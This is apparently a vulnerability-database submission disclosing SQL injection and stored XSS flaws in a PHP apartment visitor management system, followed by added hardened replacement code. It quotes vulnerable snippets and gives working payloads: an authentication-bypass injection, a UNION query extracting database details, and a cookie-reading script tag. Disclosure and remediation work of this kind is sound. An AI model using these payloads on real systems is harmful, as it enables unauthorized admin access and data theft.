Submit #43328: There are SQL injection and XSS vulnerabilities in apartment management system 2.0

Title: There are SQL injection and XSS vulnerabilities in apartment management system 2.0

Description: There are SQL injection and XSS vulnerabilities in the apartment visitor management system. When logging in to the account, the application does not check the user's input. The user can log in directly to the admin account with a universal password, without entering a password, which threatens the security of the website.

Vulnerability file location: /index.php. Look at this source code:

```php
if(isset($_POST['login'])){
    $adminuser=$_POST['username'];          // taken from the request unchecked
    $password=md5($_POST['password']);
    // username is concatenated straight into the SQL string
    $query=mysqli_query($con,"SELECT ID from tbladmin where UserName='$adminuser' && Password='$password' ");
```

The username entered by the user is not checked; the input content is controlled by the user. The user logs in directly to the admin account with the universal password. The statement is as follows:

```
username=admin' or 1=1 --+
```

Vulnerability file location: /action-visitor.php. Look at this source code:

```php
$eid=$_GET['editid'];       // taken from the query string unchecked
$remark=$_POST['remark'];
// both values are concatenated straight into the SQL string
$query=mysqli_query($con,"UPDATE tblvisitor set remark='$remark' where ID='$eid'");
```

The editid input by the user is not checked; the input content is controllable by the user. The user can construct malicious statements to attack the website and illegally obtain database data. The statement is as follows:

```
action-visitor.php?editid=0' union select 1,database(),@@version,@@datadir,5,6,7,8,9,10,11,12--+
```

https://s1.ax1x.com/2022/08/10/v3peFU.png

Vulnerability file location: /profile.php. Look at this source code:

```php
if(isset($_POST['update'])) {
    $adminid=$_SESSION['avmsaid'];
    $AName=$_POST['adminname'];        // stored and later rendered without escaping
    $mobno=$_POST['mobilenumber'];
    $email=$_POST['email'];
```

Users can construct POST submissions at will, which leads to an XSS vulnerability and poses a threat to the security of the website. The constructed statement is as follows:

```
<script>alert(document.cookie)</script>
```

https://s1.ax1x.com/2022/08/10/v8E0E9.png
https://s1.ax1x.com/2022/08/10/v8EdHJ.png

Source link: https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code
Source: https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code/
User: qidian (UID 30810)
Submission: 10.08.2022 17:10 (4 years ago)
Moderation: 11.08.2022 11:16 (18 hours later)
Status: Accepted
VulDB Entry: 206168 [SourceCodester Apartment Visitor Management System action-visitor.php editid/remark SQL Injection]
Points: 20
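Hardened replacements for the three snippets quoted in the submission (index.php login, action-visitor.php remark update, profile.php output), as an added example that is not part of the submission or of the project's own code. It assumes `$con` is an open `mysqli` connection and that the table and column names are exactly those shown in the submission (`tbladmin`, `tblvisitor`, `UserName`, `Password`, `remark`, `ID`); `md5()` is kept only because that is what the existing `Password` column stores.

```php
<?php
// Added example, not the project's code. Assumes $con is an open mysqli connection
// and the schema (tbladmin, tblvisitor, UserName, Password, remark, ID) from the submission.

// Throw on SQL errors instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// index.php: login with a prepared statement. Both values are bound as parameters,
// so a username such as  admin' or 1=1 --+  is compared literally and never reaches
// the SQL parser as syntax. md5() is kept to match the existing tbladmin.Password
// column; moving to password_hash()/password_verify() is a separate change.
function adminLogin(mysqli $con, string $username, string $password): ?int
{
    $hash = md5($password);
    $stmt = $con->prepare('SELECT ID FROM tbladmin WHERE UserName = ? AND Password = ?');
    $stmt->bind_param('ss', $username, $hash);
    $stmt->execute();
    $stmt->bind_result($id);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (int) $id : null;
}

// action-visitor.php: editid must be a positive integer and remark is bound as a
// string. A value like  0' union select ...  fails the integer check and is
// rejected before any query is built.
function updateVisitorRemark(mysqli $con, string $editid, string $remark): bool
{
    $id = filter_var($editid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false; // reject rather than let the raw value reach the query
    }
    $stmt = $con->prepare('UPDATE tblvisitor SET remark = ? WHERE ID = ?');
    $stmt->bind_param('si', $remark, $id);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected === 1;
}

// profile.php: the stored admin name, mobile number and email are attacker-controlled
// strings. Escape them every time they are written into HTML so that
// <script>alert(document.cookie)</script> is rendered as text, not executed.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderProfileField(string $label, string $value): string
{
    return '<label>' . h($label) . '</label><input type="text" value="' . h($value) . '">';
}

// Request handling, replacing the raw $_POST / $_GET reads quoted in the submission.
if (isset($_POST['login'])) {
    $adminId = adminLogin($con, (string) ($_POST['username'] ?? ''), (string) ($_POST['password'] ?? ''));
    if ($adminId !== null) {
        session_regenerate_id(true);   // fresh session id after privilege change
        $_SESSION['avmsaid'] = $adminId;
    }
}
if (isset($_GET['editid'], $_POST['remark'])) {
    updateVisitorRemark($con, (string) $_GET['editid'], (string) $_POST['remark']);
}
```

Parameter binding fixes the two injection points because the attacker's quote and comment characters never become SQL syntax; validating `editid` as an integer is an extra check that also stops the `union select` payload from being stored or logged. For the XSS, the fix is on output, not input: `h()` is applied at the point where the stored profile values are written into the page, which is the only place where the `<script>` payload can do harm.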